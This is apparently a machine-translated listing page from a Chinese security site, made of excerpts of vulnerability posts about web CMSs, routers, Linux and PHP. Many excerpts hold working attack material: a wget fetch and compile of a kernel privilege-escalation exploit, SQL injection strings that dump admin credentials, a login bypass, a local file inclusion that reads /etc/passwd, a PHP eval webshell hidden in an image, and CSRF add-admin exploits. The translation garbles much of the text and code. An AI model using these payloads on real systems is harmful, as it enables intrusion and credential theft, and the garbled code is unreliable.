JEECMS the background of any file editing vulnerability and get a shell-vulnerability warning-the black bar safety net

JEECMS is based on java technology development, inheritance of its strong, stable, secure, efficient, cross-platform, and many other advantages · use of SpringMVC3+Spring3+Hibernate3+Freemarker mainstream technical architecture security is doing very perverted, when the site after the installatio...

Unfamiliar street plaintext submit the registration information of the plaintext transmission-vulnerability warning-the black bar safety net

Unfamiliar Street is Beijing, unfamiliar street Technology Co., Ltd. launched a location-based mobile social products. Its login authentication using a cleartext user ID and password. Detailed description: Unfamiliar Street is Beijing, unfamiliar street Technology Co., Ltd. launched a...

Linux 2.6.39 to 3.2.0 explosion mention the right vulnerability-vulnerability warning-the black bar safety net

Download the exploit file wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c 2. Compile gcc mempodipper. c-o mempodipper 3. Before executing the view netcat@netcat:$ uname-r 3.0.0-1 2-generic netcat@netcat:$ cat /etc/issue Ubuntu 11.10 n l netcat@netcat:$ uname-a Linux netcat 3.0.0-1...

WordPress EditorMonkey (FCKeditor)remote file upload vulnerability-vulnerability warning-the black bar safety net

EditorMonkey is WordPress in a plugin,EditorMonkey in the FCKeditor editor is the presence of a remote file upload vulnerability can lead an attacker directly exploit the vulnerability to obtain the webshell on. +info: WordPress EditorMonkey FCKeditor Remote File Upload Author : kaMtiEz...

An anti-injection of a noob error-thousand Bo enterprise program-vulnerability warning-the black bar safety net

Thousand Bo enterprise Station program, anti-injected into the statement where there is a little error! Detail: If EnableStopInjection = True Then If Request. QueryString "" Then Call StopInjectionRequest. QueryString If Request. Cookies "" Then Call StopInjectionRequest. Cookies If Request...

An enterprise system is the presence of injection and solution-vulnerability warning-the black bar safety net

Brief description: An enterprise system infocont. asp file exists injectionvulnerabilities, the total Station does not filter special characters! Pro! Detailed description: A business website system infocont. aspfile exists injection. See the following code %@LANGUAGE="VBSCRIPT" CODEPAGE="9 3 6"%...

Network fun shopping system flagship version of eshop backend get webshell-vulnerability warning-the black bar safety net

Disclosure of status: 2012-03-04: positive contact vendors and wait for manufacturers to claim, details not open to the public 2012-03-04: the vendors have actively ignored vulnerabilities, the details disclosed to the public Brief description: eWebEditor editor filter is not strict, direct uploa...

Enterprise into the Electric Company enterprise website management system v1. 0(English version)vulnerability-vulnerability warning-the black bar safety net

File: Company. asp % ID=trimrequest. QueryString"id" if ID="" then ID=1 set Rs = server. createobject"adodb. recordset" Rs. source = "select from Company where ID="&ID&"" Rs. open Rs. source,conn,1,3 if Rs. eof then Content="also did not add relevant content!" else Kig=Rs"Kig" Rs"kig"=Kig+1 Rs...

Netease blog The permission check is not strict cause blog in the encrypted log and the draft disclosure-vulnerability warning-the black bar safety net

Brief description: the vulnerability can cause users to blog in encrypted log friends visible, private, and log the draft leaked. Detailed description: The Netease blog log module of the AJAX request interface via the URL parameter to pass the user level, visitors, friends, bloggers, and not the...

Search for a cms with php through the kill-vulnerability warning-the black bar safety net

Author: z2681 From: 90sec Vulnerability files to the admin directory adminloginstate.php Look at the code ifempty$COOKIE'SAdminID' echo "scriptwindow. location='adminlogin.php'/script"; exit; elseif$COOKIE'SLogin'!= md5$COOKIE'SAdminID'.$ COOKIE'SAdminUserName'.$ COOKIE'SAdminPassWord'.$...

shypostShyPost enterprise website management system a number of vulnerabilities-vulnerability warning-the black bar safety net

ShyPost enterprise management system with dozens of templates, the user can freely choose a different template background management functions is the same, the following is one of the templates before and after the test, welcome to the user testing. Background demo:...

phpcms-exp 0day-vulnerability warning-the black bar safety net

Reprinted from dis9.com ---------------------- ? php errorreportingEERROR; settimelimit0; $keyword=’inurl:about/joinus’ ; // batch keywords $timeout = 1; $stratpage = 1; $lastpage = 1 0 0 0 0 0 0 0; for $i=$stratpage ; $i=$lastpage ; $i++ $array=ReadBaiduList$keyword,$timeout,$i; foreach $array a...

Debian ‘x11-common’ Init script insecure temporary file creation vulnerability-vulnerability warning-the black bar safety net

Vulnerability causes Design errors The level of danger Low The impact of the system Debian x11-common 1:7.5+8 Not affected system Hazards A local attacker could exploit the vulnerability could elevate privileges or destruction of the system. Attack required conditions The attacker must have acces...

Yealink VOIP Phone persistent cross-site scripting flaws and fixes-vulnerability warning-the black bar safety net

Title: Yealink VOIP Phone Persistent Cross Site Scripting Vulnerability Product: Yealink Easy VOIP Phone Development website: http://www.yealink.com/ Author: Narendra Shinde =================================================== Developer description: --------------------------- Yealink is the...

Topics Viewer CSRF add admin-vulnerability warning-the black bar safety net

Title: Topics viewer CSRF Add Admin Author: The Green Hornet www.badguest.cn [email protected] Software download address: http://www.traidnt.net/Portal/Sites/Scripts/topics-viewer-v2.0-beta-1-traidnt.net.html Affected version:2.0 BETA 1 +++++++++++++++++++++++ html body...

ContaoCMS (aka TYPOlight) <= 2.11 CSRF (delete admin/delete articles)-vulnerability warning-the black bar safety net

Title: ContaoCMS aka TYPOlight = 2.11 CSRF Delete Admin - Delete Article Author: Ivano Binetti http://ivanobinetti.com Download address: http://www.contao.org/en/download.html The development of this website: http://www.contao.org Affects versions: 2.11.0 latestand earlier Test platform: Debian...

Document vulnerability ShellCode look-vulnerability warning-the black bar safety net

Inscription: still very much like to put this topic, put so long, also modified several versions, are not satisfied, today was pushed again to write, as much as possible to put themselves know something write it out, learn the need to constantly summary of to accumulate, on a Sunday ride out, see...

COCOON Counter statistical procedures vulnerability summary-vulnerability warning-the black bar safety net

A default database: counter/db/dbCCCounter6. mdb It can also be directly opened: http://www.badguest.cn /Counter/utilities/update. asp To view the source file, lookup! You can find the database address. Program problem. Second, the storm path vulnerability Use the probe http://www. xxx. com...

Dlink DCS series CSRF change the administrative password-vulnerability warning-the black bar safety net

Title: Dlink DCS series CSRF Change Admin Password Affected version: DCS-9 0 0, DCS-2 0 0 0, DCS-5 3 0 0 and possibly other. Author: rigan - [email protected] -- A description of the problem: Dlink DCS is a camera series These cameras with the one containing the csrf flaw in the web interface Thi...

php source code audit of the cookies spoofing-vulnerability warning-the black bar safety net

ebycms is a mobile music cms system Direct codes admin 目录 下 的 in.php Judgment$AdminCookies is empty if not empty on landing into $AdminCookies the value of the source cookies adminnamevalue Modify cookies to bypass authentication ! !...

almnzm 2.4 <= CSRF flaws (add administrator)and fix-vulnerability warning-the black bar safety net

Developer: almnzm.com Author: HaNniBaL KsA HK [email protected] CSRF testadd a new administrator : centerbfont face="Tahoma" size="5" font color="FF0000"Priv8/font span dir="ltr"font color="FF0000"Almnzm 2.4/fontfont color="ffffff" /font/span CSRF Exploit!! /fontfont face="Tahoma" size="2"/fontfont...

DirCMS arbitrary file read 0day-vulnerability warning-the black bar safety net

Feel time really flies really fast, the computer opened an off day is gone. Can't go on like this, so I'm going to take some time to write the blog and learning, recording their growth. Whether it be a programmer, or a security engineer, reading someone else's code is undoubtedly progress in a...

D-Link DSL-2640B (ADSL Router) CSRF flaws and fixes-vulnerability warning-the black bar safety net

Title: D-Link DSL-2640B ADSL Router CSRF Vulnerability Author: Ivano Binetti www.badguest.cn http://ivanobinetti.com Program website: http://www.d-link.com Affected version: DSL-2640B Test platform: Firmware Version: EU4. 0 0; Hardware Version: B2 +-----------------------------------------------...

SyndeoCMS <= 3.0 CSRF flaws and fixes-vulnerability warning-the black bar safety net

Title: SyndeoCMS = 3.0 CSRF Vulnerability Author: Ivano Binetti http://ivanobinetti.com Program development website: http://www.syndeocms.org/ Download address: http://sourceforge.net/projects/syndeocms Affected version: 3.0 and below Test System Platform: Debian Squeeze 6.0 +--------------+Add...

Mitra Iranian CMS remote file upload flaws and fixes-vulnerability warning-the black bar safety net

Title: Mitra Iranian CMS Remote File Upload Author: BHG Security Center Nitrojen90 Development website: http://www.nationalcms.ir/ Affected version: the full series Danger level::High Test System Platform: Windows Test example: http://www.badguest.cn...

4PSA CMS SQl injection flaws and fixes-vulnerability warning-the black bar safety net

Title: 4PSA CMS SQL Injection Vulnerabilities Author: BHG Security Center www.2cto.com Nitrojen90 Development program official website: http://www.4psa.com/ Affected version: latest version Risk level: high Testing platform: GNU/Linux - Windows Example: http://www.badguest.cn /print. php? id=SQL...

Fork CMS v. 3. 2. 4 multiple defects ( LFI - XSS )-a vulnerability warning-the black bar safety net

Title: Fork CMS v. 3. 2. 4 - Multiple Vulnerabilities Developers: http://www.fork-cms.com Author: RandomStorm - http://www.randomstorm.com Avram Marius Gabriel d3v1l Test platform: Windows XP & Vista The management panel of the reflection type cross-siteXSS Test: http://www.badguest.cn...

kuwebs cool the weft enterprise website management system to discover the source code of built-in Backdoor-vulnerability warning-the black bar safety net

Disclosure of status: 2012-02-17: positive contact vendors and wait for manufacturers to claim, details not open to the public 2012-02-17: the vendors have actively ignored vulnerabilities, the details disclosed to the public Brief description: The source code in the presence of a get back the...

BuyWebArt <<< SQL injection and fix-vulnerability warning-the black bar safety net

Author: Infamous Test example http://www.badguest.cn /path/xxxx. php? id=xxx&id=Sqli Examples http://www.badguest.cn/page.php?id=german http://www.badguest.cn/article.php?aid=3649&sid=1 9 http://www.badguest.cn/send-gift-cards.php?id=8...

mysql injecting sleep statements caused denial of service and repair programme-vulnerability warning-the black bar safety net

mysql the presence of injection, and injecting sleep statements if you pass in a large enough parameter, for example: sleep9 9 9 9 9 9 9 9 9 9. If the database is using the myisam engine, and the injection point is a will lock TABLE statement, insert,replace,update,delete, then the entire data...

Ananta Gazelle CMS upload statement for registration and fix-vulnerability warning-the black bar safety net

The head of the table: Ananta Gazelle CMS - Update Statement Sql injection Author: hackme Download address: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/AnantaGazelle1.0.zip/ Impact version: 1.0 stable Test platform: backbox 2.1 First for my bad English, sorry + This...

aspcms background files without authentication injection+ cookie spoofing-vulnerability warning-the black bar safety net

Brief Description: The background file AspCmsAboutEdit. asp not validated and unfiltered, resulting inSQL injection. And pure in cookies cheat! Detailed description:-------- background injection-------- http://www.2cto.com /admin/content/About/AspCmsAboutEdit. asp? id=1%20and%2 0...

Cyberoam Central Console v2. 0 0. 2 file contains and fixes-vulnerability warning-the black bar safety net

Title:Cyberoam Central Console v2. 0 0. 2 - File Include Vulnerability Overview: Cyberoam Central Console CCC appliances offer the flexibility of hardware CCC appliances and virtual CCC appliances to provide centralized security management across distributed Cyberoam UTM appliances, enabling high...

ThinkSAAS upload File Vulnerabilities-vulnerability warning-the black bar safety net

Author:Insight-D. Software Link: http://www.thinksaas.cn Useful to uploadify2. 1. 4 The program has this problem A lot of cms use this uploadify.php many programmers directly calling the swf file regardless of the uploadify. php has lead to security problems generated Download:...

ECShop v2. 7. 2 wap page storm path 0day-vulnerability warning-the black bar safety net

Google: inurl:mobile/goods. php? act=viewimg&id=1 2 3 Search to After in page plus&id=5 That is, http://www. badguest. cn/mobile/goods. php? act=viewimg&id=1 2 3&id=5 For example, for many forums, submitted a non-existent file request, or submit a There is no output file of the request, the serve...

Hearing the odd tourist site system injection vulnerability-vulnerability warning-the black bar safety net

The entire system is the injection of! Such as: JingdianShow. asp NewsShow. asp These files contain UU. Lable. All. asp Code: Function UULableJingdianSstrList Set rs = Server. CreateObject"adodb. recordset" sql = "select from UUJingdian where Jingdianid=" Jingdianid&" " rs. Open sql, Conn, 1, 1 I...

Tencent microblogging XSS attack vulnerability-vulnerability warning-the black bar safety net

from: author:Kingthy's I believe we all know Sina Weibo in 6 on 2 8 may occurXSSattack event? That night, a large number of Sina Weibo users to automatically send tweets and automatically focus on one called“hellosamy“of the user. What exactlyXSSattacks why can have so much power for? Now many...

PHP local file inclusion(LFI)exploit-vulnerability warning-the black bar safety net

This study main references are: http://downloads.ackack.net/LocalFileInclusion.pdf Experimental code: If you are on linux, be submitted directly to: test. php? for=/etc/passwd%0 0 to display the file. ? php include$GET'for'.‘. php’;//for testing local include vulnerability ?& gt; If it is on win,...

Android webkit XSS cross-domain Auto-Download vulnerability-vulnerability warning-the black bar safety net

Android Multiple Vulnerabilities Author: www.80vul.com Email:5up3rh3igmail.com Release Date: 2012/2/8 References: http://www.80vul.com/android/android-0days.txt Ph4nt0m Webzine 0x06 has been releasedhttp://www.80vul.com/webzine0x06/,there three papers on the android application security about the...

Postal savings banks the UKEY useless-vulnerability warning-the black bar safety net

Today to the postal Savings Bank postal savings bank of china to go to the opening of the postal green card through the online banking, in order to safeguard the Bank account of the funding security, the requirements for online banking opened UKEY protection, the Bank staff attitude good, and...

oykX blog background post injection 0day-vulnerability warning-the black bar safety net

In the black bar safety net search oykX turned out to confiscate recorded this 0day Into http://zhouxiang. psdzj. com/admin/index. aspx In the account input box at the fill 1 2 3'Or 1=1 and '1'='1 Password is blank, also can be messy to fill, and click on the Login prompt for password error The...

nginx fastcgi configuration mistakes+parsing vulnerability-induced vulnerability-vulnerability warning-the black bar safety net

Now there are many sites with nginx, since the N months before the nginx parsing vulnerability since now almost all fixed, the General statement is written so if $fastcgiscriptname ../. php return 4 0 3; When matching/. phpwhen it returns 4 0 3 但是 有些 fastcgi 配置 的 却 不只 有 .php and some are even...

LASERnet CMS Version 1.5 SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

Use method: http://www.badguest.cn/index.php?id=SQL Demo: http://www.badguest.cn /index. php? id=-1' UNION SELECT 1,2,3,CONCATWSCHAR32,58,32,user,database,version,5,6,7,8,9,1 0,1 1,1 2,1 3--+ Provide solution The filter index. php page id=parameter input...

DNS domain transfer disclosure vulnerability details-vulnerability warning-the black bar safety net

The zone transfer operation refers to a backup server to use from the main server's data to refresh their zone database. This is running the DNS service provides a certain degree of redundancy, its purpose is to prevent the primary domain name server due to an unexpected fault becomes unavailable...

IIS7. 0 website, the exploit and the Fix-vulnerability warning-the black bar safety net

To the currently popular PHP as an example: To merge a PHP word pictures of horses, the combined method: ① , DOS merge: copy 1.gif /b + 1. txt/a php.gif ② , With edjpgcom, make picture and word Trojan of the merger, remark Code of? php eval$POSTmeckun;?& gt; Pictures just to find one...

Southern data editor(southidceditor)injection 0day vulnerabilities-vulnerability warning-the black bar safety net

Injection point:newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may beanother versionnewssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...

PHP also has a major vulnerability multi-language denial of service vulnerability in the event of early warning-vulnerability warning-the black bar safety net

Security sector monitoring the current PHP 5.3.9 is the hackers found there is a serious security vulnerability, a remote attacker could directly exploit this vulnerability to execute arbitrary PHP code, The security risk is very high. After follow-up, the vulnerability, the CVE-2 0 1 2-0 8 3 0 i...

oday or exp mining techniques overview-vulnerability warning-the black bar safety net

A lot of times we on various 0day or exp with strong passion, indeed, the hand grip of such powerful weapons of destruction will make the target's combat becomes very smooth, but the problem is that not everyone can grasp the latest 0day, and to be clear that there is a lot we do not know the 0da...

Notepad Dog microblogging 3. 0 0day-vulnerability warning-the black bar safety net

You know.... wap/index. php? mod=pm&pmnew=andselect%2 0 1%20fromselect%20count,concatselect%2 0select%2 0select%20concat0x27,0x7e,jishigoumembers. username,0x27,0x7e,jishigoumembers. password,0x27,0x7e%20from%20jishigoumembers%20where%20uid=1%20limit%200,1%20from%20informationschema...

A lot of the rebate Taobao guest program Duoduo v7. 3 injection vulnerability-vulnerability warning-the black bar safety net

Vulnerability details Disclosure of status: 2012-01-29: positive contact vendors and wait for manufacturers to claim, details not open to the public 2012-01-29: the vendors have actively ignored vulnerabilities, the details disclosed to the public Brief description:...